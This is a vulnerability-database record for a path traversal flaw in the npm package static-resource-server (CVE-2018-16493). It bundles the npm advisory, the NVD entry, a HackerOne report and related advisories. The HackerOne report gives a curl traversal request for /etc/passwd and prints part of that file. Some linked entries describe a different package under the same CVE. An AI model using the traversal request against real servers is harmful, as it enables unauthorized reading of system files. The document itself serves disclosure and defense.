ID NODEJS:967 Type nodejs Reporter libcontainer Modified 2019-06-18T19:59:57
Description
Overview
All versions of static-resource-server are vulnerable to Path Traversal. Due to insufficient input sanitization, attackers can access server files by using relative paths.
Recommendation
No fix is currently available. Consider using an alternative module until a fix is made available.
{"id": "NODEJS:967", "type": "nodejs", "bulletinFamily": "software", "title": "Path Traversal", "description": "## Overview\n\nAll versions of `static-resource-server` are vulnerable to Path Traversal. Due to insufficient input sanitization, attackers can access server files by using relative paths. \n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative module until a fix is made available.\n\n\n## References\n\n- [HackerOne Report](https://hackerone.com/reports/432600)", "published": "2019-06-14T15:26:57", "modified": "2019-06-18T19:59:57", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://www.npmjs.com/advisories/967", "reporter": "libcontainer", "references": [], "cvelist": ["CVE-2018-16493"], "lastseen": "2020-09-29T11:10:42", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-16493"]}, {"type": "hackerone", "idList": ["H1:432600"]}, {"type": "github", "idList": ["GHSA-45J8-PM75-5V8X"]}, {"type": "nodejs", "idList": ["NODEJS:968"]}], "modified": "2020-09-29T11:10:42", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2020-09-29T11:10:42", "rev": 2}, "vulnersScore": 6.3}, "affectedSoftware": [{"name": "static-resource-server", "operator": "ge", "version": "0"}]}
{"cve": [{"lastseen": "2021-02-02T06:52:31", "description": "A path traversal vulnerability was found in module static-resource-server 1.7.2 that allows unauthorized read access to any file on the server by appending slashes in the URL.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-02-01T18:29:00", "title": "CVE-2018-16493", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-16493"], "modified": "2019-10-09T23:36:00", "cpe": ["cpe:/a:static-resource-server_project:static-resource-server:1.7.2"], "id": "CVE-2018-16493", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16493", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:static-resource-server_project:static-resource-server:1.7.2:*:*:*:*:node.js:*:*"]}], "hackerone": [{"lastseen": "2019-03-24T08:19:02", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2018-16493"], "description": "# Module\n\n**module name:** static-resource-server\n**version:** 1.7.2\n**npm page:** `https://www.npmjs.com/package/static-resource-server`\n\n## Module Description\n\n> A tiny http server that provides local static resource access \n\n## Module Stats\n\n> Replace stats below with numbers from npm\u2019s module page:\n\n[0] downloads in the last day\n[0] downloads in the last week\n[12] downloads in the last month\n\n~ 639 Downloads per Year\n\n# Vulnerability\n\n## Vulnerability Description\n\n> Directory traversal through the url which doesn't verify the file is from the root directory path.\n\n## Steps To Reproduce:\n\n> install static-resource-server using npm\n\n`$ npm install static-resource-server`\n\nrun server from command line:\n\n`$ ./static-resource-server -P 8080 --root $HOME/data/static`\n\nuse curl to try accessing internal files\n\n`$ curl --path-as-is --url 'http://127.0.0.1:8080/../../../../etc/passwd' `\n\nNow the corresponding file will be loaded from the server and sent as response to the client ( curl )\n\nResult:\n\n```\n##\n# User Database\n# \n# Note that this file is consulted directly only when the system is running\n# in single-user mode. At other times this information is provided by\n# Open Directory.\n#\n# See the opendirectoryd(8) man page for additional information about\n# Open Directory.\n##\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\ndaemon:*:1:1:System Services:/var/root:/usr/bin/false\n_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico\n_taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false\n_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false\n_installassistant:*:25:25:Install Assistant:/var/empty:/usr/bin/false\n<<< MASKED DATA >>>\n```\n\n\n## Supporting Material/References:\n\n- MacOS 10.14.1 \n- Node version v10.11.0\n- npm version 6.4.1\n\n# Wrap up\n\n- I contacted the maintainer to let them know: No\n- I opened an issue in the related repository: No\n\n## Impact\n\nThis vulnerability allows to read content of any file on the server", "modified": "2019-01-03T19:02:03", "published": "2018-11-01T06:25:40", "id": "H1:432600", "href": "https://hackerone.com/reports/432600", "type": "hackerone", "title": "Node.js third-party modules: [static-resource-server] Path Traversal allows to read content of arbitrary file on the server", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nodejs": [{"lastseen": "2020-09-29T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2018-16493"], "description": "## Overview\n\nVersions of `simplehttpserver` prior to 0.2.1 are vulnerable to Path Traversal. Due to insufficient input sanitization, attackers can access server files by using relative paths. \n\n## Recommendation\n\nUpgrade to version 0.2.1 or later.\n\n## References\n\n- [HackerOne Report](https://hackerone.com/reports/357109)", "modified": "2019-06-18T19:59:37", "published": "2019-06-14T15:35:55", "id": "NODEJS:968", "href": "https://www.npmjs.com/advisories/968", "type": "nodejs", "title": "Path Traversal", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "github": [{"lastseen": "2021-01-08T23:37:15", "bulletinFamily": "software", "cvelist": ["CVE-2018-16493"], "description": "Versions of `simplehttpserver` prior to 0.2.1 are vulnerable to Path Traversal. Due to insufficient input sanitization, attackers can access server files by using relative paths. \n\n\n## Recommendation\n\nUpgrade to version 0.2.1 or later.", "edition": 4, "modified": "2021-01-08T19:57:26", "published": "2019-02-07T18:18:04", "id": "GHSA-45J8-PM75-5V8X", "href": "https://github.com/advisories/GHSA-45j8-pm75-5v8x", "title": "Path Traversal in simplehttpserver", "type": "github", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
